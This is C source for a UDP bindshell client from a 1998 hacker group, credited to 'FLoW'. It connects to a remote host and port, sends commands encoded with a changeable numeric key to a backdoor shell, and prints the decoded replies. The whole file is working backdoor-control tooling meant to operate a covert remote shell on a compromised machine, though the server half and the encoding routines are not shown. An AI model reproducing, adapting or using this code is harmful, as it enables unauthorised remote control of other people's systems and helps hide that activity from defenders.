/*
 * UDP bindshell v1.0 client by FLoW - !H'98
 * Tested on Linux 2.0.33, FreeBSD 2.2 & Solaris 2.5.1
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <stdio.h>
#include <netinet/in.h>
#include <fcntl.h>
#include <netdb.h>

#define SA struct sockaddr
#define SAI struct sockaddr_in
#define IA struct in_addr

#define LIMIT BUFSIZ

#define MODE_COM 0
#define MODE_DAT 1

extern Dec (char *, int);
extern Enc (char *, int);

int tmpkey=0, key=214;

void
usage (void)
{
  fprintf (stderr, "udpc host port\n");
  exit (1);
}

void
error (char *msg, int valor)
{
  fprintf (stderr, "%s\n", msg);
  exit (valor);
}

unsigned long
name_resolve (char *host_name)
{
  struct in_addr addr;
  struct hostent *host_ent;
    
  if ((addr.s_addr = inet_addr (host_name)) == -1)
   {
   if (!(host_ent = gethostbyname (host_name)))
   return (0);
   memcpy ((char *) &addr.s_addr, host_ent->h_addr, host_ent->h_length);
   }
  return (addr.s_addr);
}
                                    

void sig_al (void);

int alarma = 0;

void main (int argc, char **argv)
{

  SAI *sin, *cin;
  int mida, port;
  int s;
  int buit, mode = MODE_COM;

  int known;
  
  const char chmida[2]="1";
  
  fd_set rfds;
  struct timeval tv;

  char *data, *host;
  
  sin = (SAI *) malloc (sizeof (SA));
  cin = (SAI *) malloc (sizeof (SA));

  data = (char *) malloc (LIMIT);
  host = (char *) malloc (LIMIT);

  if (argc < 3)
    usage ();

  strncpy(host,argv[1], LIMIT - 1);
  port=atoi(argv[2]);
  
  sin->sin_port = htons (port);
  sin->sin_family = AF_INET;
//  sin->sin_addr.s_addr = inet_addr (host);
  sin->sin_addr.s_addr = name_resolve (host);
  if(!sin->sin_addr.s_addr)
    error ("Unknown host", 1);

  if ((s = socket (AF_INET, SOCK_DGRAM, 0)) < 0)
    error ("Error obrint socket", 1);

  setsockopt (s, SOL_SOCKET, SO_REUSEADDR, chmida, sizeof (chmida));

  mida = sizeof (SA);
  connect (s, (SA *) sin, mida);

  fcntl (s, F_SETFL, O_NONBLOCK);

  while (1)
    {

      if (mode == MODE_COM)
	{
	  printf ("udpc> ");
	}

      else
	{
	  printf ("# ");
	}

      memset (data, 0, LIMIT);
      fgets (data, LIMIT - 1, stdin);

      if (mode == MODE_COM)
	{
	  *(data + strlen (data) - 1) = 0;

	  if (strlen (data) != 0)
	    {
	    
	    /* Start command parsing */
	    
	    known=0;

	    if(!strcmp(data,"key"))
	    {
	    printf ("New key? ");
	    fgets(data,LIMIT - 1, stdin);
	    tmpkey=atoi(data);
	    memset(data,0,LIMIT);
	    sprintf(data,"%c%i",214,tmpkey);
	    Enc(data, key);
	    send(s,data,strlen(data),0);
	    key=tmpkey;
	    printf ("Key changed to %i\n",key);

	    known=1;
	    }

	    if(!strcmp(data,"data"))
	    {
	    known=1;
	    printf("Swapping to data mode...\n");
	    mode=MODE_DAT;
	    }

	    if(!strcmp(data,"quit"))
	    {
	    known=1;
	    exit(0);
	    }
	    
	    if(known==0)
	    {
	    printf ("Available commands: data key quit\n");
	    }
	    
	    }
	}			/* fMODE_COM */

      else
	/* MODE_DATA */
	{
	if(strcmp(data,"CONSOLE\n"))
	{
	
	  Enc (data, key);
	  send (s, data, strlen (data), 0);
	  memset (data, 0, LIMIT);

/* CODE HERE */
	  FD_ZERO (&rfds);
	  FD_SET (s, &rfds);

	  tv.tv_sec = 2;
	  tv.tv_usec = 0;

	  buit = 1;

	  while (select (s + 1, &rfds, NULL, NULL, &tv))
	    {


	      while ((read (s, data, LIMIT - 1) > 0))
		{
		  buit = 0;
		  Dec (data, key);
		  printf ("%s", data);
		  memset (data, 0, LIMIT);
		}

	      FD_ZERO (&rfds);
	      FD_SET (s, &rfds);

	      tv.tv_sec = 0;
	      tv.tv_usec = 100;

	    }
	  if (buit)
	    {
	      printf ("Timeout reading.\n");
	    }
	  }
	  else
	  {
	  mode=MODE_COM;
	  }
	}			/* fMODE_DAT */
    }

}

